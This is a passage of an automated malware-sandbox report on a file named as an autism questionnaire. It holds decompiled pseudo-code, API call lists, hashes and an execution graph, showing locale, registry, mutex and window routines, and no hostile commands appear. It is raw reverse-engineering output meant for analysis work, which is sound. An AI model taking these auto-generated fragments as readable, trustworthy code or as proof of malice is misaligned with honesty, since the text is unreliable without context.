				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                                                              0x0040a6d0
                                                                                              0x0040a6d2
                                                                                              0x0040a6d6
                                                                                              0x0040a6e2
                                                                                              0x0040a6ec
                                                                                              0x0040a6ef
                                                                                              0x0040a6f1
                                                                                              0x0040a6f8
                                                                                              0x0040a6fb
                                                                                              0x0040a70c
                                                                                              0x0040a712
                                                                                              0x0040a715
                                                                                              0x0040a718
                                                                                              0x0040a71b
                                                                                              0x0040a721
                                                                                              0x0040a727
                                                                                              0x0040a737
                                                                                              0x0040a737
                                                                                              0x0040a740
                                                                                              0x0040a745
                                                                                              0x0040a749
                                                                                              0x0040a74e
                                                                                              0x0040a753
                                                                                              0x0040a755
                                                                                              0x0040a756
                                                                                              0x0040a75d
                                                                                              0x0040a765
                                                                                              0x0040a76a
                                                                                              0x0040a76a
                                                                                              0x0040a770
                                                                                              0x0040a773
                                                                                              0x0040a773
                                                                                              0x0040a75d
                                                                                              0x0040a77a
                                                                                              0x0040a781
                                                                                              0x0040a781
                                                                                              0x0040a78a
                                                                                              0x0040a794
                                                                                              0x0040a7a2
                                                                                              0x0040a7aa
                                                                                              0x0040a7c7
                                                                                              0x0040a7c7
                                                                                              0x0040a7cf
                                                                                              0x00000000
                                                                                              0x0040a7d7
                                                                                              0x0040a7e1

                                                                                              APIs
                                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                                                • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                                                • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                                              • String ID:
                                                                                              • API String ID: 2255706666-0
                                                                                              • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                              • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                                              • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                              • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                                                              0x00420bde
                                                                                              0x00420be3
                                                                                              0x00420be7
                                                                                              0x00420bef
                                                                                              0x00420bf4
                                                                                              0x00420bf4
                                                                                              0x00420c00
                                                                                              0x00420c07
                                                                                              0x00000000
                                                                                              0x00420c07
                                                                                              0x00420c0d

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                              • API String ID: 1646373207-1127948838
                                                                                              • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                              • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                                              • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                              • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp PID: 2880 Parent PID: 7084 Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCOMMON

                                                                                              Execution Graph

                                                                                              Execution Coverage:8.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:1.2%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:60

                                                                                              Graph

                                                                                              execution_graph 19299 410300 19301 410308 19299->19301 19300 410355 19301->19300 19305 40d79c 19301->19305 19303 410344 LoadStringW 19310 40a350 19303->19310 19306 40d7c9 19305->19306 19307 40d7aa 19305->19307 19306->19303 19307->19306 19314 40d754 19307->19314 19311 40a360 19310->19311 19312 40a1ec 12 API calls 19311->19312 19313 40a37a 19312->19313 19313->19300 19315 40d764 GetModuleFileNameW 19314->19315 19316 40d780 19314->19316 19318 40e9e0 GetModuleFileNameW 19315->19318 19316->19303 19319 40ea2e 19318->19319 19328 40e8bc 19319->19328 19321 40ea5a 19322 40ea74 19321->19322 19323 40ea6c LoadLibraryExW 19321->19323 19354 40a228 19322->19354 19323->19322 19329 40e8dd 19328->19329 19330 40a1c8 12 API calls 19329->19330 19331 40e8fa 19330->19331 19332 40e965 19331->19332 19362 40a5f0 19331->19362 19334 40a228 12 API calls 19332->19334 19335 40e9d2 19334->19335 19335->19321 19336 40e940 19366 40e5e0 19336->19366 19341 40e967 GetUserDefaultUILanguage 19374 40df90 EnterCriticalSection 19341->19374 19342 40e958 19343 40e70c 14 API calls 19342->19343 19343->19332 19348 40e9a9 19348->19332 19413 40e7f0 19348->19413 19349 40e98f GetSystemDefaultUILanguage 19351 40df90 29 API calls 19349->19351 19352 40e99c 19351->19352 19353 40e70c 14 API calls 19352->19353 19353->19348 19355 40a22e 19354->19355 19356 40a254 19355->19356 19357 406f28 12 API calls 19355->19357 19358 40a1c8 19356->19358 19357->19355 19359 40a1ce 19358->19359 19361 40a1e9 19358->19361 19360 406f28 12 API calls 19359->19360 19359->19361 19360->19361 19361->19316 19364 40a5f4 19362->19364 19363 40a618 19363->19336 19431 40b698 19363->19431 19364->19363 19435 406f28 19364->19435 19367 40e602 19366->19367 19371 40e614 19366->19371 19491 40e2c4 19367->19491 19369 40e60c 19515 40e644 19369->19515 19372 40a1c8 12 API calls 19371->19372 19373 40e636 19372->19373 19373->19341 19373->19342 19375 40dfdc LeaveCriticalSection 19374->19375 19376 40dfbc 19374->19376 19377 40a1c8 12 API calls 19375->19377 19378 40dfcd LeaveCriticalSection 19376->19378 19379 40dfed IsValidLocale 19377->19379 19380 40e07e 19378->19380 19381 40e04b EnterCriticalSection 19379->19381 19382 40dffc 19379->19382 19386 40a1c8 12 API calls 19380->19386 19383 40e063 19381->19383 19384 40e010 19382->19384 19385 40e005 19382->19385 19393 40e074 LeaveCriticalSection 19383->19393 19611 40dc78 19384->19611 19592 40de74 GetThreadUILanguage 19385->19592 19390 40e093 19386->19390 19399 40e70c 19390->19399 19392 40e023 19394 40e034 GetSystemDefaultUILanguage 19392->19394 19623 40b470 19392->19623 19393->19380 19396 40dc78 15 API calls 19394->19396 19397 40e041 19396->19397 19398 40b470 12 API calls 19397->19398 19398->19381 19400 40e72b 19399->19400 19401 40a1c8 12 API calls 19400->19401 19409 40e749 19401->19409 19402 40e7b7 19403 40a1c8 12 API calls 19402->19403 19404 40e7bf 19403->19404 19405 40a1c8 12 API calls 19404->19405 19407 40e7d4 19405->19407 19406 40b698 12 API calls 19406->19409 19408 40a228 12 API calls 19407->19408 19410 40e7e1 19408->19410 19409->19402 19409->19404 19409->19406 19677 40b4c8 19409->19677 19688 40e6a0 19409->19688 19410->19348 19410->19349 19695 40a2ac 19413->19695 19416 40e840 19417 40b4c8 12 API calls 19416->19417 19418 40e84d 19417->19418 19419 40e6a0 14 API calls 19418->19419 19421 40e854 19419->19421 19420 40e88d 19422 40a228 12 API calls 19420->19422 19421->19420 19423 40b4c8 12 API calls 19421->19423 19424 40e8a7 19422->19424 19425 40e87b 19423->19425 19426 40a1c8 12 API calls 19424->19426 19428 40e6a0 14 API calls 19425->19428 19427 40e8af 19426->19427 19427->19332 19429 40e882 19428->19429 19429->19420 19430 40a1c8 12 API calls 19429->19430 19430->19420 19432 40b6a3 19431->19432 19433 40a350 12 API calls 19432->19433 19434 40b6d9 19433->19434 19434->19336 19436 406f36 19435->19436 19437 406f2c 19435->19437 19436->19363 19437->19436 19440 40701c 19437->19440 19441 40702e 19440->19441 19442 407041 19441->19442 19446 41063c 19441->19446 19454 407010 19442->19454 19447 410671 TlsGetValue 19446->19447 19448 41064b 19446->19448 19449 410656 19447->19449 19450 41067b 19447->19450 19448->19442 19457 4105f8 19449->19457 19450->19442 19453 41066a 19453->19442 19471 40a028 19454->19471 19460 4105fe 19457->19460 19458 41062c TlsGetValue 19458->19453 19459 410617 19470 4105e4 LocalAlloc 19459->19470 19460->19458 19460->19459 19467 40a034 19460->19467 19463 41061e 19464 410622 19463->19464 19465 41062e TlsSetValue 19463->19465 19466 40a034 11 API calls 19464->19466 19465->19458 19466->19458 19468 40a028 12 API calls 19467->19468 19469 40a04c 19468->19469 19469->19459 19470->19463 19474 409ef8 19471->19474 19475 409f0e 19474->19475 19476 409f1f 19474->19476 19478 409e60 GetStdHandle WriteFile GetStdHandle WriteFile 19475->19478 19477 409f28 GetCurrentThreadId 19476->19477 19479 409f35 19476->19479 19477->19479 19481 409f18 19478->19481 19480 409fa4 19479->19480 19482 406fd0 9 API calls 19479->19482 19483 409b58 KiUserCallbackDispatcher 19480->19483 19481->19476 19485 409f8c 19482->19485 19484 409fa9 19483->19484 19487 409fcf FreeLibrary 19484->19487 19488 409fd5 19484->19488 19485->19480 19486 406fd0 9 API calls 19485->19486 19486->19485 19487->19488 19489 40a00e 19488->19489 19490 40a006 ExitProcess 19488->19490 19492 40e2db 19491->19492 19493 40e2ef GetModuleFileNameW 19492->19493 19495 40e304 19492->19495 19493->19495 19494 40e32c RegOpenKeyExW 19496 40e353 RegOpenKeyExW 19494->19496 19497 40e3ed 19494->19497 19495->19494 19498 40e4d3 19495->19498 19496->19497 19499 40e371 RegOpenKeyExW 19496->19499 19521 40e0d4 GetModuleHandleW 19497->19521 19501 40a1c8 12 API calls 19498->19501 19499->19497 19502 40e38f RegOpenKeyExW 19499->19502 19504 40e4e8 19501->19504 19502->19497 19505 40e3ad RegOpenKeyExW 19502->19505 19503 40e40b RegQueryValueExW 19506 40e429 19503->19506 19507 40e45c RegQueryValueExW 19503->19507 19504->19369 19505->19497 19510 40e3cb RegOpenKeyExW 19505->19510 19511 40e431 RegQueryValueExW 19506->19511 19508 40e45a 19507->19508 19509 40e478 19507->19509 19513 40e4c2 RegCloseKey 19508->19513 19514 406f28 12 API calls 19508->19514 19512 40e480 RegQueryValueExW 19509->19512 19510->19497 19510->19498 19511->19508 19512->19508 19513->19369 19514->19513 19516 40e652 19515->19516 19517 40e65c 19515->19517 19537 405d88 19516->19537 19519 40e679 19517->19519 19557 405a04 19517->19557 19519->19371 19522 40e10d 19521->19522 19523 40e0fc GetProcAddress 19521->19523 19526 40e123 19522->19526 19528 40e16f 19522->19528 19533 40e0b0 19522->19533 19523->19522 19526->19503 19527 40e0b0 CharNextW 19527->19528 19528->19526 19529 40e0b0 CharNextW 19528->19529 19530 40e1f4 FindFirstFileW 19528->19530 19532 40e25e lstrlenW 19528->19532 19529->19528 19530->19526 19531 40e210 FindClose lstrlenW 19530->19531 19531->19526 19531->19528 19532->19528 19534 40e0be 19533->19534 19535 40e0cc 19534->19535 19536 40e0b6 CharNextW 19534->19536 19535->19526 19535->19527 19536->19534 19538 405e80 19537->19538 19541 405d9d 19537->19541 19539 405814 19538->19539 19542 405da3 19538->19542 19540 405f7a 19539->19540 19581 405764 19539->19581 19540->19517 19541->19542 19544 405e1a Sleep 19541->19544 19543 405dac 19542->19543 19547 405e5e Sleep 19542->19547 19549 405e95 19542->19549 19543->19517 19544->19542 19546 405e34 Sleep 19544->19546 19546->19541 19547->19549 19550 405e74 Sleep 19547->19550 19555 405f14 VirtualFree 19549->19555 19556 405eb8 19549->19556 19550->19542 19551 405855 19553 40585e VirtualQuery VirtualFree 19551->19553 19554 40584c 19551->19554 19552 40583b VirtualFree 19552->19554 19553->19551 19553->19554 19554->19517 19555->19517 19556->19517 19558 405c64 19557->19558 19559 405a1c 19557->19559 19560 405d7c 19558->19560 19561 405c28 19558->19561 19569 405a2e 19559->19569 19572 405ab9 Sleep 19559->19572 19563 4057b0 VirtualAlloc 19560->19563 19564 405d85 19560->19564 19567 405c42 Sleep 19561->19567 19573 405c82 19561->19573 19562 405a3d 19562->19519 19565 4057eb 19563->19565 19566 4057db 19563->19566 19564->19519 19565->19519 19568 405764 2 API calls 19566->19568 19571 405c58 Sleep 19567->19571 19567->19573 19568->19565 19569->19562 19570 405b1c 19569->19570 19574 405afd Sleep 19569->19574 19580 405b28 19570->19580 19586 4056e8 19570->19586 19571->19561 19572->19569 19576 405acf Sleep 19572->19576 19575 4056e8 VirtualAlloc 19573->19575 19578 405ca0 19573->19578 19574->19570 19577 405b13 Sleep 19574->19577 19575->19578 19576->19559 19577->19569 19578->19519 19580->19519 19582 4057ac 19581->19582 19583 40576d 19581->19583 19582->19551 19582->19552 19583->19582 19584 405778 Sleep 19583->19584 19584->19582 19585 405792 Sleep 19584->19585 19585->19583 19590 40567c 19586->19590 19588 4056f1 VirtualAlloc 19589 405708 19588->19589 19589->19580 19591 40561c 19590->19591 19591->19588 19593 40de90 19592->19593 19594 40dee9 19592->19594 19635 40de30 GetThreadPreferredUILanguages 19593->19635 19595 40de30 2 API calls 19594->19595 19603 40def1 19595->19603 19598 40df32 19599 40df88 19598->19599 19600 40df38 SetThreadPreferredUILanguages 19598->19600 19599->19381 19602 40de30 2 API calls 19600->19602 19604 40df4e 19602->19604 19603->19598 19606 406f28 12 API calls 19603->19606 19605 40df69 SetThreadPreferredUILanguages 19604->19605 19607 40df79 19604->19607 19605->19607 19606->19598 19608 406f28 12 API calls 19607->19608 19609 40df80 19608->19609 19610 406f28 12 API calls 19609->19610 19610->19599 19612 40a1c8 12 API calls 19611->19612 19616 40dcb3 19612->19616 19613 40dd09 19614 40dd1c IsValidLocale 19613->19614 19615 40ddbf 19613->19615 19614->19615 19617 40dd2f GetLocaleInfoW GetLocaleInfoW 19614->19617 19618 40a228 12 API calls 19615->19618 19616->19613 19639 40db98 19616->19639 19621 40dd6a 19617->19621 19619 40dddc GetSystemDefaultUILanguage 19618->19619 19619->19381 19619->19392 19652 40b550 19621->19652 19624 40b474 19623->19624 19626 40b4bf 19623->19626 19625 40b47e 19624->19625 19632 40a5a8 19624->19632 19625->19626 19627 40b4b4 19625->19627 19628 40b499 19625->19628 19626->19394 19631 40b3f0 12 API calls 19627->19631 19630 40b3f0 12 API calls 19628->19630 19629 40a5ec 19629->19394 19634 40b49e 19630->19634 19631->19634 19632->19629 19633 406f28 12 API calls 19632->19633 19633->19629 19634->19394 19636 40de51 19635->19636 19637 40de6a SetThreadPreferredUILanguages 19635->19637 19638 40de5a GetThreadPreferredUILanguages 19636->19638 19637->19594 19638->19637 19640 40dbbe 19639->19640 19641 40a5f0 12 API calls 19640->19641 19642 40dc40 19640->19642 19643 40dbea 19641->19643 19645 40a228 12 API calls 19642->19645 19644 40a1c8 12 API calls 19643->19644 19648 40dbf1 19644->19648 19646 40dc5a 19645->19646 19646->19613 19647 40b550 12 API calls 19647->19648 19648->19642 19648->19647 19650 40b698 12 API calls 19648->19650 19651 40a5f0 12 API calls 19648->19651 19658 40db2c 19648->19658 19650->19648 19651->19648 19653 40b566 19652->19653 19654 40b5eb 19653->19654 19656 40b5a1 19653->19656 19662 40b3f0 19653->19662 19654->19654 19656->19654 19669 40a5a8 19656->19669 19659 40db3c 19658->19659 19660 40a1c8 12 API calls 19659->19660 19661 40db87 19660->19661 19661->19648 19663 40b43b 19662->19663 19666 40b3fd 19662->19666 19664 40a1ec 12 API calls 19663->19664 19665 40b438 19664->19665 19665->19656 19666->19663 19667 40b415 19666->19667 19667->19665 19673 40a1ec 19667->19673 19670 40a5ac 19669->19670 19671 40a5ec 19670->19671 19672 406f28 12 API calls 19670->19672 19671->19654 19672->19671 19674 40a1f2 19673->19674 19675 40a20d 19673->19675 19674->19675 19676 406f28 12 API calls 19674->19676 19675->19665 19676->19675 19678 40b4cc 19677->19678 19683 40b53a 19677->19683 19679 40b4d4 19678->19679 19680 40a5a8 19678->19680 19682 40a5a8 12 API calls 19679->19682 19679->19683 19685 40b4e3 19679->19685 19681 40a5ec 19680->19681 19684 406f28 12 API calls 19680->19684 19681->19409 19682->19685 19683->19683 19684->19681 19685->19683 19686 40a5a8 12 API calls 19685->19686 19687 40b536 19686->19687 19687->19409 19689 40e6b5 19688->19689 19690 40e6d2 FindFirstFileW 19689->19690 19691 40e6e2 FindClose 19690->19691 19692 40e6e8 19690->19692 19691->19692 19693 40a1c8 12 API calls 19692->19693 19694 40e6fd 19693->19694 19694->19409 19696 40a2b0 GetUserDefaultUILanguage GetLocaleInfoW 19695->19696 19696->19416 19697 42b8a3 SetErrorMode 19698 405a04 19699 405c64 19698->19699 19700 405a1c 19698->19700 19701 405d7c 19699->19701 19702 405c28 19699->19702 19710 405a2e 19700->19710 19713 405ab9 Sleep 19700->19713 19704 4057b0 VirtualAlloc 19701->19704 19705 405d85 19701->19705 19708 405c42 Sleep 19702->19708 19714 405c82 19702->19714 19703 405a3d 19706 4057eb 19704->19706 19707 4057db 19704->19707 19709 405764 2 API calls 19707->19709 19712 405c58 Sleep 19708->19712 19708->19714 19709->19706 19710->19703 19711 405b1c 19710->19711 19715 405afd Sleep 19710->19715 19720 4056e8 VirtualAlloc 19711->19720 19721 405b28 19711->19721 19712->19702 19713->19710 19717 405acf Sleep 19713->19717 19716 4056e8 VirtualAlloc 19714->19716 19719 405ca0 19714->19719 19715->19711 19718 405b13 Sleep 19715->19718 19716->19719 19717->19700 19718->19710 19720->19721 19722 405d88 19723 405e80 19722->19723 19726 405d9d 19722->19726 19724 405814 19723->19724 19727 405da3 19723->19727 19725 405f7a 19724->19725 19730 405764 2 API calls 19724->19730 19726->19727 19729 405e1a Sleep 19726->19729 19728 405dac 19727->19728 19732 405e5e Sleep 19727->19732 19734 405e95 19727->19734 19729->19727 19731 405e34 Sleep 19729->19731 19733 405825 19730->19733 19731->19726 19732->19734 19735 405e74 Sleep 19732->19735 19736 405855 19733->19736 19737 40583b VirtualFree 19733->19737 19740 405f14 VirtualFree 19734->19740 19741 405eb8 19734->19741 19735->19727 19738 40585e VirtualQuery VirtualFree 19736->19738 19739 40584c 19736->19739 19737->19739 19738->19736 19738->19739 19742 6ace20 19743 6ace42 19742->19743 19744 6ace30 FreeLibrary 19742->19744 19744->19743 19745 6c4660 19757 410ba8 GetModuleHandleW 19745->19757 19751 6c46d5 19768 6b9870 19751->19768 19753 6c46e7 19799 5b8250 19753->19799 19756 6c4767 19758 410be3 19757->19758 19807 409c2c 19758->19807 19761 6b9800 GetModuleHandleW 19821 414020 19761->19821 19763 6b9815 19764 5b8740 19763->19764 19765 5b874f 19764->19765 19766 5b876c 19764->19766 19765->19766 19767 5b8759 SendMessageW 19765->19767 19766->19751 19767->19766 19832 610358 19768->19832 19770 6b989e 19786 6b99a8 19770->19786 19846 5c6f50 GetCommandLineW 19770->19846 19772 40a228 12 API calls 19774 6b9a16 19772->19774 19776 40a228 12 API calls 19774->19776 19775 6b990d 19777 6b999c 19775->19777 19778 6b9917 19775->19778 19779 6b9a23 19776->19779 19782 6b99aa 19777->19782 19783 6b99a4 19777->19783 19910 5c6fb0 19778->19910 19779->19753 19781 5c6fb0 14 API calls 19797 6b98c2 19781->19797 19931 6b8998 19782->19931 19783->19786 19853 6b9138 19783->19853 19786->19772 19787 6b99bf 19790 40a028 12 API calls 19787->19790 19793 6b99c9 19790->19793 19791 6b9936 19927 5cbf50 19791->19927 19792 6b99de 19795 409ef8 12 API calls 19792->19795 19793->19786 19794 6b98e2 19794->19775 19795->19786 19797->19775 19797->19781 19797->19794 19798 6b9964 19798->19753 19801 5b8264 19799->19801 19800 5b82a9 ShowWindow 19800->19756 19801->19800 19802 5b829c 19801->19802 19803 5b8288 19801->19803 19804 5b8278 SetWindowTextW 19801->19804 19805 40a5a8 12 API calls 19802->19805 19806 5b8295 SetWindowTextW 19803->19806 19804->19802 19805->19800 19806->19802 19808 409c64 19807->19808 19811 409bc0 19808->19811 19812 409c08 GetWindowLongW SetWindowLongW SetErrorMode 19811->19812 19813 409bd0 19811->19813 19812->19761 19813->19812 19816 5c857c FormatMessageW 19813->19816 19820 4103b4 GetSystemInfo 19813->19820 19817 5c85a2 19816->19817 19818 40a350 12 API calls 19817->19818 19819 5c85c2 19818->19819 19819->19813 19820->19813 19822 414054 19821->19822 19823 414048 GetProcAddress 19821->19823 19825 40a1ec 12 API calls 19822->19825 19824 4140a8 19823->19824 19826 40a1ec 12 API calls 19824->19826 19828 41406a 19825->19828 19827 4140bd 19826->19827 19827->19763 19829 414081 GetProcAddress 19828->19829 19830 40a1ec 12 API calls 19829->19830 19831 4140a0 19830->19831 19831->19763 19833 5c6fb0 14 API calls 19832->19833 19834 61037e 19833->19834 19835 6103c2 19834->19835 19839 61039f 19834->19839 19836 40a5a8 12 API calls 19835->19836 19837 6103cc 19836->19837 19838 40a1c8 12 API calls 19837->19838 19840 6103c0 19838->19840 19841 40b698 12 API calls 19839->19841 19842 40a1c8 12 API calls 19840->19842 19843 6103af 19841->19843 19844 6103e8 19842->19844 19845 40b698 12 API calls 19843->19845 19844->19770 19845->19840 19963 5c6e00 19846->19963 19848 5c6f72 19849 5c6f8b 19848->19849 19850 5c6e00 12 API calls 19848->19850 19851 40a1c8 12 API calls 19849->19851 19850->19848 19852 5c6fa0 19851->19852 19852->19775 19852->19797 19854 6b9140 19853->19854 19854->19854 19855 6b9147 19854->19855 19856 5c6fb0 14 API calls 19855->19856 19858 6b916b 19856->19858 19857 6b917c 19861 5b8250 14 API calls 19857->19861 19858->19857 19859 5c6fb0 14 API calls 19858->19859 19860 6b918f 19859->19860 19860->19857 19864 6b94d5 19860->19864 19862 6b91b4 ShowWindow 19861->19862 19977 6af824 19862->19977 19866 40a228 12 API calls 19864->19866 19869 6b94ef 19866->19869 19868 6b91d7 ShowWindow 19870 6b9210 ShowWindow 19868->19870 19871 6b91f0 19868->19871 19872 40a228 12 API calls 19869->19872 19874 5c6fb0 14 API calls 19870->19874 19985 5b8704 19871->19985 19875 6b94fc 19872->19875 19877 6b9238 19874->19877 19875->19792 19989 5c4f90 19877->19989 19880 5c6fb0 14 API calls 19881 6b9252 19880->19881 19882 5c4f90 12 API calls 19881->19882 19883 6b9262 19882->19883 20000 5c685c 19883->20000 19886 6b9272 20004 5cd6bc 19886->20004 19887 6b9471 20098 423a20 19887->20098 19890 6b927e 19894 5b8250 14 API calls 19890->19894 19892 423a20 5 API calls 19893 6b9481 19892->19893 20107 6b9098 19893->20107 19896 6b92a2 19894->19896 20029 6ac8cc 19896->20029 19900 6b94bb ReleaseMutex CloseHandle 19901 6b94cd 19900->19901 19901->19792 19911 5c6ffb GetCommandLineW 19910->19911 19912 5c6fd7 GetModuleFileNameW 19910->19912 19920 5c7002 19911->19920 19913 40a350 12 API calls 19912->19913 19914 5c6ff9 19913->19914 19918 40a1c8 12 API calls 19914->19918 19915 5c7008 19916 40a1c8 12 API calls 19915->19916 19919 5c7010 19916->19919 19917 5c6e00 12 API calls 19917->19920 19921 5c7044 19918->19921 19922 40a5a8 12 API calls 19919->19922 19920->19915 19920->19917 19920->19919 19923 5cbfb8 19921->19923 19922->19914 19924 5cbfc2 19923->19924 19926 5cc007 19924->19926 21359 5cbf3c GetLastError 19924->21359 19926->19791 19928 5cbf64 19927->19928 19929 5cbf74 19928->19929 19930 5cbe88 106 API calls 19928->19930 19929->19798 19930->19929 19932 5b8250 14 API calls 19931->19932 19933 6b89ce ShowWindow 19932->19933 19934 6af824 67 API calls 19933->19934 19935 6b89f6 19934->19935 19936 5c745c GetSystemDirectoryW 19935->19936 19937 6b89fe 19936->19937 21362 424020 19937->21362 19939 6b8a06 19940 5c6fb0 14 API calls 19939->19940 19941 6b8a10 19940->19941 19942 40a5a8 12 API calls 19941->19942 19943 6b8a1d 19942->19943 21365 6b6c80 19943->21365 19946 5c4f90 12 API calls 19947 6b8a34 19946->19947 19948 40a5a8 12 API calls 19947->19948 19949 6b8a41 19948->19949 19950 5c4f90 12 API calls 19949->19950 19951 6b8a53 19950->19951 19952 40a5a8 12 API calls 19951->19952 19953 6b8a60 19952->19953 19954 5cbfb8 107 API calls 19953->19954 19955 6b8a78 19954->19955 19956 5cbf50 106 API calls 19955->19956 19957 6b8ab2 19956->19957 19958 6b8acb 19957->19958 19959 6b8abb 19957->19959 19961 5cd6bc 108 API calls 19958->19961 19960 5cd6bc 108 API calls 19959->19960 19962 6b8ac9 19960->19962 19961->19962 19962->19787 19964 5c6e2b 19963->19964 19965 40a350 12 API calls 19964->19965 19966 5c6e38 19965->19966 19973 40a774 19966->19973 19968 5c6e40 19969 40a5a8 12 API calls 19968->19969 19970 5c6e58 19969->19970 19971 40a1c8 12 API calls 19970->19971 19972 5c6e80 19971->19972 19972->19848 19975 40a6ec 19973->19975 19974 40a727 19974->19968 19975->19974 19976 406f28 12 API calls 19975->19976 19976->19974 20128 5c7f24 19977->20128 19980 6af83c 20134 407384 QueryPerformanceCounter 19980->20134 19983 6af850 19984 413e90 CreateMutexW 19983->19984 19984->19868 19987 5b870a 19985->19987 19988 5b8717 MsgWaitForMultipleObjects 19987->19988 20249 5b85f0 PeekMessageW 19987->20249 19988->19870 19988->19871 19990 5c4fba 19989->19990 19991 5c4fce 19990->19991 19992 5c4fc0 19990->19992 19993 40b698 12 API calls 19991->19993 19994 40b4c8 12 API calls 19992->19994 19996 5c4fe1 19993->19996 19995 5c4fcc 19994->19995 19998 40a1c8 12 API calls 19995->19998 19997 40b4c8 12 API calls 19996->19997 19997->19995 19999 5c5003 19998->19999 